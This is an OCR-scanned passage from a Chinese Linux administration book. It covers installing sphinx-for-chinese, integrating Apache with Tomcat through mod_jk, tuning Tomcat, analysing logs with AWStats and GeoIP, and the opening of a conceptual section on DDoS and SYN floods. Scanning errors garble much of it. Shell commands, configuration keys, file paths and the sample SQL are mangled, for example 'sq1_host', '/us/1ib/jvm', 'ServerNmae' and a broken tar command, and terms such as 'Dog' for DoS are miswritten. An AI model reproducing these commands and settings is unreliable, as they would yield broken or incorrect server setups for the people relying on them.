xdict 1.1.tar.gz 


下 载 地 址 为 http://code.google.com/p/sphinx-for-chinese/downloads/list。 
贺 安装 sphinx-for-chinese。 


$ tar zxvf sphinx-for-chinese-0.9.9-r2117.tar.gz 
$ cd sphinx-for-chinese-0.9.9-r2117 

$ ./configure --prefix=/usr/local/sphinx 

$ make 

$ sudo make install 


加 创建 test 数据 库 ， 并 创建 sphinx 用 户 。 


mysql> create database test7 
mysql>create user 'test'@'localhost' identified by "test'7 
mysql>grant all privileges on test.* to '‘'test'@'localhost'; 


四 指定 sphinx 配置 文件 。 


$ cd /usr/local/sphinx/etc 
$ sudo cp sphinx.conf.dist sphinx.conf 


加 编辑 配置 文件 。 


sq1_host = localhost 

sql user = test 

sql_pass = test 

sql db = test 

sql_ port = 3306 # optional, default is 3306 


到 这 里 为 止 ，Sphinx 已 经 可 以 使 用 了 ， 但 还 不 能 支持 中 文 切 词 ， 以 下 是 加 入 中 文 切 词 的 


四 解压 字典 文件 xdict_ 1.1.tar.gz。 


S tar gxvE Xdict LL.tar gz 


Web 系统 集成 与 安全 第 1 章 


加 借助 先前 安装 的 mkdict 工具 生成 字典 。 


$ /usr/local/sphinx/bin/mkdict xdict.txt xdict 


因 将 字典 xdict 复制 到 /usr/local/sphinx/etc 目录 下 。 
加 配置 中 文 切 词 。 打 开 sphinx.conf 文件 ， 找 到 “charset type=sbcs” 字 样 ， 将 其 改 为 : 


Charset type = utf-8 
chinese dictionary = /usr/local/sphinx/etc/xdict 


至 此 中 文 切 词 配置 完成 ， 下 面 做 一 个 简单 的 测试 。 
编辑 sphinx-for-chinese 自 带 的 SQL 脚本 ， 加 入 中 文 数据 。 


$ vi /usr/local/sphinx/etc/example.sql 
REPLACE INTO test.documents ( id, group_id, group id2, date added, title, 
content ) VALUES 
(1, 1, 5, NOW(), 'test one', 'this is my test document number one. also 
checking search within Phrases-' )， 
2，1，6，NOW()，'test two', 'this is my test document number two' )， 
3, 2, 7, NOW(), ‘'another doc', 'this is another group' )， 
2, 8, NOW(), 'doc number four', 'this is to test groups' )， 
5, 2, 8, NOW(), 'doc number five', 一个" 区 
Gr 27 ,87 NOW()'r ?doc riumber Six ' 我 ' 全 
7, 2, 8, NOW(), 'doc number seven', ' 中 国人 ' ) 7 


说 明 : 汉字 部 分 是 中 文 测 试 数据 。 
四 导入 数据 。 


$ mysql -usphinx -psphinx < example.sql 


器 建立 索引 。 


$ sudo /usr/local/sphinx/bin/indexer --all 


四 检索 . 


$ /usr/local/sphinx/bin/search 我 是 一 个 中 国人 

Sphinx 0.9.9-release (r2117) 

Copyright (c) 2001-2009, Andrew Aksyonoff 

using config file '/usr/local/sphinx/etc/sphinx.conf'... 

index 'test1l': query ' 我 是 一 个 中 国人 ': returned 0 matches of 0 total in 
0.000 sec 

words: 

1. ' 我 ': 1 documents, 1 hits 

2. ' 是 ': 0 documents, 0 hits 

3。 ' 一 个 ': 1 documents, 1 hits 

4. ' 中 国人 ': 1 documents, 1 hits 

index 'testlstemmed': query ' 我 是 一 个 中 国人 ': returned 0 matches of 0 
total in 0.000 sec 


心 


Linux ”企业 应 用 案例 精 解 


1. ' 我 ': 1 documents, 1 hits 

2. ' 是 ': 0 documents, 0 hits 

3. ' 一 个 ': 1 documents, 1 hits 
4. ' 中 国人 ': 1 documents, 1 hits 


至 此 ，sphinx-for-chinese 已 经 成 功 安装 并 顺利 通过 测试 。 
1.7 Apache 与 Tomcat 集成 


前 面 已 详细 介绍 了 搭建 LAMP 平台 的 过 程 ,这 里 我 们 进一步 介绍 Apache 服务 器 与 Tomcat 
的 集成 ， 以 便 支持 JSP。 因 为 Apache 支持 静态 页 面 ，Tomecat 支持 动态 页 面 ， 所 以 可 以 使 用 
Apache+Tomeat 的 方式 把 它们 的 优势 结合 起 来 ， 即 强 强 联合 。Apache 负责 转发 ， 对 JSP 的 处 
理 则 交 给 Tomcat 来 处 理 。 也 就 是 说 ，Apache 专门 提供 HTTP 服务 ， 以 及 相关 配置 (例如 虚拟 
主机 、URL 转发 等 ), 而 Tomcat 是 Apache 组 织 在 符合 PEE 的 JSP、Servlet 标准 下 开发 的 JSP 
服务 器 ， 看 到 这 里 读者 可 能 会 有 个 疑问 ， 既 然 Apache 和 Tomcat 都 是 Web 服务 器 ， 为 什么 不 
直接 用 Tomcat 服务 器 呢 ? 反而 去 和 Apache 服务 器 集成 ， 这 不 是 多 此 一 举 吗 ? 其 实 不 然 ， 因 
为 Tomcat 支持 Servlet 和 JSP， 本 身 是 可 以 作为 Web Server， 当 处 理 大 量 静 态 页 面 时 ，Tomcat 
不 如 Apache 性 能 好 ， 不 如 Apache 那样 强壮 。 但 是 Apache 作为 最 流行 的 Web 服务 器 虽然 能 
高 效 地 处 理 静 态 页 面 ,但 并 不 支持 JSP 及 Servlet, 所 以 通常 的 做 法 是 把 它们 合 二 为 一 , 让 Apache 
处 理 静态 页 面 ， 而 把 动态 页 面 的 请 求 交 给 Tomcat 处 理 ， 发 挥 各 自 的 优势 。 通 过 在 Apache 中 
加 载 整合 模块 和 进行 设置 ，Apache 就 能 够 根据 URL， 把 不 属于 自己 的 请 求 转 给 Tomcat。 

要 让 Apache 和 Tomcat 联合 工作 , 还 需要 有 一 个 连接 器 把 它们 联系 起 来 。Connector 对 于 
性 能 、 配 置 的 方便 性 有 很 重要 的 影响 , 目前 大 臻 上 有 下 1.x、 下 2、mod_webapp 三 种 ，J 使 用 
比较 广泛 。 

本 节 是 在 RedHat 企业 版 5.0 下 完成 配置 ， 下 面 介绍 安装 的 步 又 。 


1.7.1 安装 模块 


(1) 下 载 mod 让 
目前 mod 六 连接 器 的 稳定 版 本 是 1.2.23, 可 使 用 Web 浏览 器 访问 http://www.apache.org/， 
下 载 mod_jk-1.2.23-apache-2.2.x-linux-1686.so。 
(2) 安装 和 配置 mod 站 


mv mod jk-1.2.23-apache-2.2.x-linux-i686.so /etc/httpd/modules/mod jk.so 


在 /usr/share/tomcat5/conf 目录 中 新 建 子 目录 下， 并 新 建文 件 works.properties 内 容 如 下 : 


workers.tomcat home=/usr/share/tomcat5 
workers.java home=/us/1ib/jvm/java 
ps=/ 
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worker.1List=ajpl13 
worker.ajpl3.port=8009 
worker.ajpl3.host=127.0.0.1 
worker.ajpl3.type=ajpl3 
worker.ajpl3.1lbfactor=1 

vi /usr/share/tomcat5/conf/server.xml 


在 语句 下 添加 : 


cp /usr/share/tomcat5/conf/auto/mod jk.conf /usr/share/tomcat5/conf/jk 

mv /usr/share/tomcat5/conf/jk/mod jk.conf /usr/share/tomcat5/conf/jk/mod jk. 
conf-auto 

vi /usr/share/tomcat5/conf/mod jk.conf-auto, 


将 此 文件 内 容 更 改 如 下 : 


loadModules jk module "/etc/httpd/modules/mod jk.so" 
JkWorkersFile "/usr/share/tomcat5/conf/jk/workers.properties" 
JkLogFile "/usr/share/tomcat5/1ogs/mod jk.1og" 

JkLogLevel emerg 

ServerNmae localhost 

JkMount /*.jsp ajpl3 


(3) 配置 Apache 
编辑 httpd.conf: 


#vi /etc/httpd/conf/httpd.conf 
添加 如 下 语句 : 


include /usr/share/tomcat5/conf/jk/mod jk.conf-auto 


1.7.2 Tomcat5 优化 


(1) JDK 内 存 优化 

Tomcat 默认 可 以 使 用 的 内 存 为 128MB ， 可 以 在 Windows 中 的 文件 
{tomcat_home}/bin/catalina.bat， 以 及 Unix 中 的 文件 {tomcat_home}/bin/catalina.sh 的 前 面 ， 增 
加 如 下 设置 : 


JAVA_OPTS=' -Xms [初始 化 内 存 大 小 ] -xmx [可 以 使 用 的 最 大 内 存 ] ' 

参数 描述 如 下 : 

@ -Xms，JVM 初始 化 堆 的 大 小 。 

@ -Xmx，JVM 堆 的 最 大 值 ， 一 般 来 说 ， 应 该 使 用 物理 内 存 的 80% 作 为 堆 大 小 。 


(2) 连接 器 优化 
在 Tomcat 配置 文件 server.xml 的 配置 中 ， 和 连接 数 相关 的 参数 如 下 。 
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maxThreads: Tomcat 使 用 线程 来 处 理 接收 的 每 个 请 求 。 这 个 值 表 示 Tomcat 可 创建 的 
最 大 的 线程 数 ， 默 认 值 为 200。 

acceptCount: 指定 当 所 有 可 以 使 用 的 处 理 请 求 的 线程 数 都 被 使 用 时 ， 可 以 放 到 处 理 队 
列 中 的 请 求 数 ， 超 过 这 个 数 的 请 求 将 不 予 处 理 ， 默 认 值 为 10。 

minSpareThreads: Tomcat 初始 化 时 创建 的 线程 数 ， 默 认 值 为 4。 

maxSpareThreads: 一 旦 创建 的 线程 超过 这 个 值 ，Tomecat 就 会 关闭 不 再 需要 的 Socket 
线程 ， 默 认 值 为 50。 

enableLookups: 是 否 反 查 域名 ， 默 认 值 为 True。 为 了 提高 处 理 能 力 ， 应 设置 为 False。 
connnectionTimeout: 网 络 连接 超时 ， 默 认 值 为 60000， 单位: ms。 设置 为 0 表示 永 不 
超时 ， 这 样 设置 是 有 隐患 的 ， 通 常 可 设置 为 30000ms。 

maxKeepAliveRequests: 保持 请 求 数量 ， 默 认 值 为 100。 

bufferSize: 输入 流 缓冲 大 小 ， 默 认 值 为 2048bytes。 

compression: 压缩 传输 ， 取 值 为 On/OfBForce， 默 认 值 为 Off。 


其 中 和 最 大 连接 数 相关 的 参数 为 maxThreads 和 acceptCount。 如 果 要 加 大 并 发 连接 数 ， 应 
同时 加 大 这 两 个 参数 。WebServer 允许 的 最 大 连接 数 还 受制 于 操作 系统 的 内 核 参数 设置 ， 通 常 
WLinux 是 1000 个 左右 。 


(3) 在 Tomcat 中 禁止 和 允许 列 目录 下 的 文件 
在 {tomcat_home}/conf/web.xml 中 ， 把 listings 参数 设置 成 false 即 可 ， 如 下 所 示 : 


<servlet> ... <init-param> <param-name>listings</param-name> <param-value> 


false</param-value> </init-param> ... </servlet> 


(4) 在 Tomcat 中 禁止 和 允许 主机 或 IP 地 址 访问 


<HostnameHostname="localhost"...> 
<ValveclassNameValveclassName="org.apache.catalina.valves. 
RemoteHostValve"allow="*.mycompany.com, www.yourcompany.com"/> 
<ValveclassNameValveclassName="org.apache.catalina.valves. 
RemoteAddrValve"deny="192.168.1.*"/> ... </Host> 这 是 服务 器 的 配置 
JAVA_ OPTS='-server-Xms512m-Xmx768m-XX:NewSize=128m 
-XX:MaxNewSize=192m-XX:SurvivorRatio=8"' 


(5) 重启 Apache 服务 和 Tomcat 服务 


#service httpd restart 
#service tomcat5 restart 


(6) 测试 Tomcat 
在 浏览 器 中 访问 地 址 http://IP:8080/， 如果 正确 打开 了 Apache Tomcat 5 的 欢迎 界面 就 表示 
设置 完毕 。 用 户 名 称 和 密码 分 别 默认 为 ttmcat 和 tomcat。 
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1.8 分 析 Apache 网 站 状态 


对 于 网 站 管理 者 而 言 ， 了 解 网 站 的 访问 量 、 独 立 人 P 数量 、 用 户 访问 的 来 源 等 信息 是 十 分 
必要 的 。 目 前 获取 网 站 访问 统计 资料 通常 有 两 种 方法 , 一 种 是 采用 第 三 方 提供 的 网 站 流量 分 析 
服务 ， 另 一 种 是 通过 在 网 站 服务 器 端 安装 统计 分 析 软 件 进行 网 站 流量 监测 。 

第 三 方 提供 的 网 站 流量 分 析 服 务 很 多 ,一般 是 提供 一 段 JavaScript 代码 嵌入 要 统计 分 析 的 
页 面 ， 当 用 户 访 问 到 该 页 面 的 JavaScript 代码 时 ， 即 在 数据 库 中 进行 一 次 记录 。 常 用 第 三 方 提 
供 的 网 站 流量 分 析 服 务 有 Google Analytics 和 Performancing 的 Metrics 等 。 第 三 方 提 供 的 服务 
比较 方便 、 灵 活 ， 能 针对 特定 的 页 面 进行 分 析 和 统计 。 但 缺点 是 ,由 于 嵌入 了 第 三 方 额 外 的 链 
接 ， 可 能 会 导致 页 面 运行 缓慢 ， 而 且 免 费 的 第 三 方 分 析 服务 功能 有 限 ， 商 业 服务 则 价格 不 菲 。 

通过 在 服务 器 上 安装 日 志 分 析 软 件 , 对 网 站 状态 进行 分 析 是 一 个 不 错 的 办 法 。 目 前 开源 的 
日 志 分 析 软 件 很 多 ， 如 AWStats、Webalizer 和 Analog 等 。 与 在 页 面 中 嵌入 代码 的 方式 不 同 ， 
由 于 每 条 日 志 都 是 有 效 的 点 击 记录 , 所 以 分 析 服务 器 日 志 的 方式 将 更 准确 和 详细 , 而 且 是 可 控 
的 。 这 种 方式 的 缺点 是 需要 开启 和 接触 到 服务 器 日 志 ， 针 对 的 是 专业 人 员 。 下 面 介绍 日 志 分 析 
软件 中 的 新 秀一 一 AWStats。 


1.8.1 AWStats 简介 


AWStats 是 一 个 基于 Perl 的 开源 软件 ， 能 对 Web、FTP 和 邮件 等 各 种 服务 的 日 志 进 行 统 
计 分 析 ， 并 产生 HTML 页 面 和 图 表 。AWStats 可 以 分 析 的 日 志 格式 包括 APache 的 两 种 日 志 格 
式 (NCSA combined/XLF/ELF 和 common/CLF) 、WebStar、IHS (W3C) 、Wap 服务 、 流 媒 
体 服务 、 邮 件 服务 和 一 些 FTP 服务 的 日 志 。 

与 其 他 开源 日 志 分 析 软 件 相 比 ，AWStats 具有 以 下 鲜明 的 特点 : 


@ 界面 友好 、 美 观 ， 可 以 基于 浏览 器 调用 相应 的 语言 ， 包 括 简体 中 文 。 

输出 项 目 非常 丰富 ， 如 对 搜索 引擎 和 搜索 引擎 机 器 人 的 统计 是 其 他 软件 少 有 的 。 
入 门 非常 简单 ， 首 次 使 用 时 仅 需 要 修改 配置 文件 4 处 即 可 。 

良好 的 扩展 性 ， 有 不 少 针对 AWStats 的 插件 。 

与 其 他 基于 C 的 日 志 分 析 软 件 相 比 ，AWStats 分 析 日 志 的 速度 稍 慢 。 


通过 AWStats 分 析 日 志 ， 用 户 可 以 看 到 以 下 数据 : 


参观 人 次 和 访问 网 站 的 卫 总 数 。 
参观 者 和 访问 网 站 的 独立 JP 数 。 
网 页 数 ， 即 访问 所 有 网 页 的 次 数 。 
文件 数 和 字 节 。 

每 个 他 的 访问 次 数 。 
访问 的 文件 类 型 。 
参观 所 花费 的 时 间 。 
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参观 者 从 什么 URL 链接 过 来 。 
操作 系统 、 浏 览 器 。 

搜索 引擎 机 器 人 的 访问 次 数 。 
从 某 个 搜索 网 站 跳 转 过 来 的 次 数 。 


1.8.2 安装 AWStats 


AWStats 的 安装 很 简单 , 将 AWStats 的 Perl 脚本 复制 到 Apache 的 CGI 目录 即 可 。 安 装 环 
境 必 须 是 支持 Perl 的 操作 系统 ， 下 面 主要 讲解 利用 AWStats 分 析 Apache 的 combined 型 日 志 。 

首先 从 AWStats 官方 网 站 http://AWStats.sourceforge.net 下 载 最 新 版 本 ， 当 前 稳定 的 版 本 
是 AWStats-6.8。 下 载 并 解压 ， 包 括 以 下 几 个 文件 或 文件 夹 : 


@ docs 文 件 天 包括 HTML 格式 的 文档 ， 叙 述 AWStats 的 安装 和 使 用 方法 。 

@ README.TXT 是 该 软件 的 介绍 和 版 权 信息 等 。 

@ tools 文 件 夹 里 面 是 一 些 脚本 和 配置 文件 ， 如 批量 Update 的 脚本 、 转 换 静 态 HTML 文 
件 的 脚本 、httpd.conf 的 配置 文件 等 。 

@ wwwroot 文 件 末 里 面 的 文件 最 为 重要 ， 包 括 AWStats 的 主要 程序 。wwwroot 文件 夹 里 面 又 
有 5 个子 文件 夹 ， 分 别 为 AWStats、css、js、icon 和 classes。 真 正 需要 使 用 的 只 有 AWStats 
和 icon 文件 夹 。 AWStats 文件 夹 中 是 AWStats 的 主 程序 , 而 icon 是 AWStats 需要 用 到 的 一 
些 图 片 和 图 标 。 如 果 可 以 控制 服务 器 ， 并 且 能 更 改 Apache 服务 的 配置 文件 ， 那 么 可 以 使 
用 tools 目录 下 面 的 AWStats_ configure .pl 脚本 进行 安装 。AWStats_ configure pl 脚本 是 一 个 
交换 式 的 脚本 ,运行 脚本 后 会 自动 检查 安装 目录 和 权限 等 ,一 般 情 况 下 ,只 需要 指定 Apache 
配置 文件 hffpd.conf 的 位 置 ， 即 可 完成 安装 。 


如 果 使 用 的 是 虚拟 主机 ， 并 没有 完全 控制 Apache 的 权限 ， 那 么 只 需 将 wwwroot/AWStats 
文件 夹 放 置 在 具有 CGI 权限 的 目录 下 ， 如 http://www.website.com/AWStats 站 点 ， 并 将 
wwwroot/icon 目录 复制 到 网 站 的 根 目 录 下 http://www.website.com/icon 即 可 完成 安装 。 


1.8.3 配置 AWStats 


首先 需要 为 站 点 建立 配置 文件 ， 在 wwwroot/AWStats/ 目 录 下 有 一 个 AWStats model.conf 
配置 文件 ， 将 其 更 名 为 AWStats.www.website.com.conf。 然 后 编辑 该 配置 文件 ， 有 几 个 选项 是 
必须 修改 的 ， 下 面 逐一 列 出 。 


(1) LogFile 
该 选项 指定 了 日 志文 件 的 路 径 和 名 称 ， 如 : 


Logfile="/home/apache loga/access.10g.2011-07-06" 
也 可 以 使 用 动态 的 变量 指定 : 


LogFile="/home/apache loga/access.10g.%YYYY-24-%MM-24-%$DD-24" 
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如 果 Apache 做 Rotate， 就 可 以 自动 取得 上 一 天 的 日 志 。 另 外 ， 如 果 日 志文 件 是 压缩 的 ， 
也 可 以 在 这 里 直接 使 用 命令 进行 读 取 ， 而 无 须 再 行 解压 ， 如 : 


LogFile="gzip-d</var/log/apache/access.10g.gz" 


(2) LogType 
该 选项 指定 需要 分 析 的 日 志 类 型 : W 代表 Web 服务 日 志 、S 代表 流 媒体 服务 日 志 、M 表 
示 邮 件 服务 日 志 、F 表示 FTP 服务 的 日 志 。 


(3) LogFormat 
LogFormat 参数 用 于 指定 使 用 的 日 志 格 式 。1 是 NCSA combined/XLF/ELF 格式 ， 也 就 是 
Apache 中 的 combined 格 式 日 志 ;2 是 IS 或 ISA 格 式 ;3 为 WebStat 格 式 ;4 为 NCSA common/CLF 
格式 ， 也 就 是 Apache 中 的 common 格式 的 日 志 。 
除了 这 4 种 默认 的 日 志 格式 外 ， 还 可 以 自 定 义 要 分 析 的 日 志 格式 ， 如 IS 和 Apache 就 可 
以 自行 对 日 志 进 行 定义 ， 要 分 析 这 样 的 日 志 必须 使 用 与 其 相对 应 的 格式 ， 如 下 面 这 样 的 格式 ; 


LogFormat="“%host%other%logname%theml%methodurl%code®%bytesd%referquot%uaquot” 


(4) SiteDomain 
SiteDomain 参数 用 于 指定 站 点 名 称 ， 此 处 指定 为 www.website.com。 


(5) HostAliases 
HostAliases 参数 表示 : 如 果 站 点 有 其 他 的 域名 ， 并 且 希 望 数 据 能 一 起 统计 ， 就 可 以 在 此 
参数 中 指定 ， 可 一 并 计算 入 内 。 例 如 指定 : 


HostAliases="localhost127.0.0.1REGEX[website\.com$]" 


(6) DirData 

DirData 参数 用 于 指定 存放 数据 文件 的 目录 ， 默 认为 当前 目录 ， 为 了 与 其 他 文件 区 别 ， 可 
以 将 其 放置 到 新 的 /data 目录 中 ， 注 意 该 目录 需要 运行 脚本 的 用 户 具 有 写 入 权限 。AWStats 默 
认 按 照 月 来 存放 文件 ， 也 就 是 说 每 个 月 对 应 一 个 相应 文件 。 

上 面前 4 项 配置 是 必须 的 ， 正 确 配置 后 ，AWStats 即 可 正常 工作 。 该 配置 文件 中 还 有 很 多 
选项 ， 可 以 做 一 些 细微 的 调节 或 添加 插件 等 。 


1.8.4 应 用 AWStats 分 析 日 志 
设置 好 配置 文件 后 ， 接 下 来 是 对 系统 日 志文 件 进行 分 析 ， 运 行 如 下 命令 : 


/path/to/AWStats-6.8/wwwroot/AWStas/AWStats.pl-config=www.website.com-update 

AWStats.pl 是 AWStats 最 重要 的 脚本 , 可 以 进行 日 志 分 析 及 查看 分 析 结果 等 操作 。 以 上 命 
令 是 对 www.website.com 域名 的 日 志 进 行 Update 操作 ，AWStats.pl 会 在 当前 目录 查找 名 称 为 
AWStats.www.website.com.conf 的 配置 文件 ， 并 根据 配置 文件 中 的 选项 对 日 志文 件 进 行 分 析 。 
最 后 将 分 析 的 结果 按照 月 份 放 在 data 目录 中 根据 配置 文件 的 设置 ) ， 如 2011 年 10 月 份 的 
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文件 为 AWStats102011.www.website.com.txt。 可 以 将 该 命令 写 入 crontab 中 ， 每 天 自动 进行 日 
志 的 分 析 ， 运 行 如 下 命令 : 

1] 太太 太 (/path/to/AWStats-6.8/wwwroot/AWStats/AWStats.pl-config=www.website. 
com-update) 


这 样 每 天 凌晨 1 点 ， 脚 本 就 会 自动 运行 ， 对 www.website.com 的 网 站 日 志 进行 分 析 。 
查看 数据 也 可 使 用 AWStats.pl 脚本 ， 在 浏览 器 中 输入 如 下 地 址 ， 即 可 查看 当月 历史 统 
计 信 息 : 


http://www.website.com/AWStats/AWStats.pl?config=www.website.com 


其 中 ，config 参数 用 于 指定 要 查看 的 域名 地 址 。 


1.8.5 ”扩展 功能 加 入 IP 插件 


AWStats 可 以 使 用 GeoIP 的 下 库 和 Perl 库 , 加 入 该 插件 后 将 能 在 AWStats 中 统计 访问 者 的 国 
籍 及 城市 。 从 http:/www.maxmind.com 中 下 载 需要 安装 的 两 个 软件 包 :C 库 GeolPC 和 了 Perl 库 GeoIP 
Perl， 建 议 使 用 GeoIP-1.3.17 和 GeoIP-1.27 两 个 版 本 ， 下 载 后 解压 并 安装 。 需 要 注意 的 是 ，GeolP 
需要 Zlib 库 支持 ， 否 则 编译 不 能 完成 ， 请 首先 确认 系统 中 是 否 已 安装 Zlib 库 。 

从 http:Wwww.maxmind.com 免费 下 载 City 的 他 文件， 解压 保存 为 /usryGeoIP/share/GeoIP/ 
GeoLiteCity.dat。 

修改 atstats.www.joecen.com.conf 配置 文件 ， 修 改 内 容 如 下 : 

Loadplugin="geoipGEOIP_ STANDARD/usr/GeolP/share/Geolp.dat™" 


LoadPlugin="geolp city maxmindGEOIP STANDARD/usr/Geolp/share/Geolp/Geolite 
City.dat" 


这 样 就 可 以 在 AWStates 中 看 到 来 源 IP 的 国家 和 城市 信息 。 

上 述 操作 如 果 没 有 root 权限 , 则 需要 在 安装 GeolP 的 时 候 加 上 prefix 参数 , 将 其 安装 在 指 
定 的 路 径 上 。 由 于 使 用 的 是 Maxmaind 公司 免费 的 世界 城市 卫 数据 ， 所 以 数据 并 不 很 完整 。 
如 果 需 要 ， 可 以 到 Maxmaind 公司 购买 收费 版 本 的 数据 。 

AWStats 是 一 个 强大 而 简洁 的 日 志 分 析 工 具 ， 其 分 析 和 统计 结果 客观 可 靠 ， 能 帮助 网 站 管 
理 者 做 出 正确 的 决策 。AWStats 的 功能 和 插件 还 有 很 多 ， 能 够 实现 许多 特殊 的 功能 ， 完 成 特定 
功能 的 日 志 分 析 ， 读 者 可 以 到 AWStats 的 官方 网 站 上 查看 相关 文章 ， 这 里 不 再 袭 述 。 


1.9 应 对 分 布 式 拒绝 服务 (DDoS ) 的 攻击 


据 一 份 《 全 球 基 础 设施 安全 报告 》 表明, 源 自 僵尸 网 络 的 容量 耗 尽 攻击 和 应 用 层 分 布 式 拒 
绝 服务 (DDoS ) 攻击 仍然 是 网 络 运营 人 员 在 将 来 面临 的 最 重大 的 威胁 。 而 这 种 DDos 威胁 可 
以 分 为 三 类 : 
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@ 容量 耗 尽 攻击 (volumetricattack )， 这 种 攻击 企图 耗 尽 转发 或 链接 容量 。 
@ 状态 表 耗 尽 攻 击 (state-exhaustion attacks )， 这 种 攻击 企图 耗 尽 基础 设施 和 服务 器 里 面 
@ 应 用 层 攻 击 ， 这 种 攻击 企图 耗 尽 应 用 层 资 源 。 


在 所 有 这 些 攻 击 中 , 攻击 者 都 是 企图 阻止 真正 的 用 户 访问 某 个 特定 的 网 络 、 服 务 和 应 用 程 
序 。 这 些 攻击 出 现 10 多 年 之 入， 可谓 互 联网 中 的 顽疾 ， 尽 管 企 业 中 部 署 防火 墙 和 IPS 等 安全 
产品 ， 它 们 利用 状态 流量 检查 技术 来 执行 网 络 策略 、 确 保 完整 性 。 遗 憾 的 是 ， 防 火 墙 或 IPS 
所 能 维护 的 状态 却 是 有 限 的 一 一 攻击 者 也 知道 这 一 点 , 所 以 当 设备 里 面 的 资源 被 耗 尽 后 , 可 能 
造成 的 结果 是 流量 丢失 、 设 备 被 锁 死 以 及 可 能 的 崩溃 ， 由 此 可 见 不 能 完全 解决 DDos 问题 。 

虽然 DDoS 攻击 难于 防范 ， 但 是 防范 DDoS 也 不 是 绝对 不 可 行 的 事情 。 本 节 将 从 DDoS 
的 原理 入 手 ， 从 企业 网 管理 员 / 系 统管 理 员 ISP/ICP 管理 员 和 骨干 网 络 运营 商 等 不 同 角度 详细 
说 明 如 何 检查 和 防范 Linux 下 的 DDoS 攻击 。 到 目前 为 止 ， 进 行 分 布 式 拒绝 服务 攻击 (DDoS ) 
的 防御 还 是 比较 困难 的 , 因为 这 种 攻击 的 特点 是 利用 了 TCP/IP 协议 的 漏洞 .除非 不 用 TCP/IP， 
才 有 可 能 完全 抵御 DDoS 攻击 。 即 使 DDoS 难于 防范 ， 也 不 应 该 “ 道 来 顺 受 ”， 实 际 上 ， 防 
范 DDoS 也 不 是 绝对 不 可 行 的 事情 。 


1.9.1 ”DDoS 攻击 原理 


俗话 说 : “知己 知 彼 ， 百 战 百胜 ”。 要 想 理解 分 布 式 拒绝 服务 攻击 的 概念 ， 首 先 要 了 解 何 
谓 Dog 攻击 。 最 基本 的 Dog 攻击 是 通过 操纵 单 台 攻击 机 连接 服务 器 , 利用 TCP 连接 的 三 次 握 
手 原理 , 发 出 大 量 合理 但 非 正 常 的 请 求 来 占用 过 多 的 服务 器 资源 , 从 而 导致 服务 器 无 法 为 其 他 
用 户 提 供 正常 服务 。 随 着 现代 计算 机 硬件 与 网 络 技术 的 飞速 发 展 , CPU 的 处 理 能 力 迅速 增长 ， 
大 容量 (G 级 ) 内 存 的 普及 ， 以 及 千 兆 级 网 络 的 出 现 ， 使 得 目标 机 器 对 恶意 攻击 包 的 “消化 能 
力 ” 大 大 加 强 。 因 此 ， 现 在 几乎 没有 人 再 用 DoS 这 种 单打 独 斗 的 攻击 方法 。 

DDoS 是 Dog 攻击 的 加 强 ， 如 果 把 DoS 比喻 为 “ 单 挑 ”， 那 么 DDoS 就 像 是 “ 群 欧 ”。 
DDoS 的 攻击 原理 与 DoS 类 似 ， 但 是 相对 于 DoS 攻击 ，DDoS 需要 更 多 的 准备 工作 。 首 先 ， 
它 会 在 攻击 目标 之 前 在 网 络 上 收集 足够 多 的 “有 漏洞 机 器 ” (俗称 “肉鸡 ”)》 作 为 攻击 机 ， 能 
力 强 的 甚至 可 以 在 已 经 控制 的 一 级 “肉鸡 ” 中 扩大 收集 更 多 有 漏洞 的 机 器 ， 形 成 如 图 1.2 所 
示 的 、 具 有 多 级 主 从 关系 的 攻击 链 。 一 旦 发 起 攻击 , 所 有 可 利用 的 攻击 机 器 会 同时 对 目标 服务 
器 展开 进攻 ， 攻 击 规模 大 ， 破 坏 力 强 。 最 为 可 恶 的 是 ， 攻 击 者 并 不 在 乎 这 些 “ 肉 鸡 ” 的 暴露 ， 
即使 “肉鸡 ”被 追踪 、 破 坏 或 无 法 使 用 ， 它 总 可 以 找到 更 多 的 蔡 代 品 。 

DDoS 的 兴起 与 网 络 的 高 速 发 展 密切 相关 。 高 速 连接 的 网 络 虽 然 给 大 家 交流 信息 带 来 了 方便 ， 
同时 也 为 DDoS 攻击 创造 了 极为 有 利 的 条 件 。 利 用 便捷 的 网 络 ， 攻 击 者 可 以 更 大 程度 地 寻找 和 控 
制 世 界 各 地 有 漏洞 的 机 器 ， 而 且 可 保证 其 速度 。 由 于 分 布 范围 广 ， 管 理 员 追踪 的 难度 也 更 高 。 

自 DoS 问世 以 来 ， 又 衍生 出 多 种 形式 。 这 里 只 详细 介绍 在 网 络 上 使 用 最 频繁 、 最 流行 的 
攻击 方法 一 一 TCP-SYN Flood 的 攻击 原理 和 防范 措施 。 
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攻击 者 ”控制 端 


电 日 | 


图 1.2 DDoS 攻击 示意 图 


前 面 提 到 Dos 攻击 会 发 出 大 量 合理 但 非 正常 的 请 求 ， 为 什么 请 求 可 以 是 合理 的 却 是 非 正 


常 的 呢 ? 因为 每 当 进行 一 次 标准 的 TCP 连接, 例如 WWW 浏览 或 下 载 文件 , TCP、IP 中 的 TCP 
协议 将 提供 可 靠 的 连接 服务 ， 采 用 三 次 握手 建立 一 个 连接 。 
@ 第 一 次 握手 : 建立 连接 时 , 客户 端 发 送 SYN 包 (seq=x) 到 服务 器 , 并 进入 SYN-SEND 
状态 ， 等 待 服务 器 确认 。 
@ 第 二 次 握手 : 服务 器 收 到 SYN 包 后 ， 必 须 确认 客户 的 SYN ( ACK=x+1 )， 同 时 发 送 一 
个 SYN 包 (seq=y)， 即 SYN+ACK 包 ， 此 时 服务 器 进入 SYN-RECYV 状态 。 
@ 第 三 次 握手 : 客户 端 收 到 服务 器 的 SYN+ACK 包 ， 向 服务 器 发 送 确 认 包 ACK 
(ack=y+l )， 此 包 发 送 完 毕 ， 客 户 端 和 服务 器 进入 ESTABLISHED 状态 。 


完成 三 次 握手 后 ， 一 次 成 功 的 TCP 连接 由 此 建立 ， 可 以 展开 后 续 工 作 了 ， 如 图 1.3 所 示 。 


HOST ‘HOST 
A B 


Cj Cf 
Send SYN 
(seq=x) SS Receive SYN 
(seq=x) 
Send SYN 
Receive SYN -一 一 (seq =y, 
(seq zy ACK =x +1) 
ACK =x +1) 
Send ACK 
(ack =y+1) 
Receive ACK 
(ack =y+1) 
图 1.3 三 次 握手 


在 上 述 过程 中 还 有 一 些 重要 的 概念 。 

@ 未 连接 队列 。 在 三 次 握手 协议 中 ， 服 务 器 维护 一 个 未 连接 队列 。 该 队列 为 每 个 客户 端 
的 SYN 包 (seq=y) 开设 一 个 条 目 ， 条 目 表 明 服 务 器 已 收 到 SYN 包 ， 并 向 客户 发 出 确 
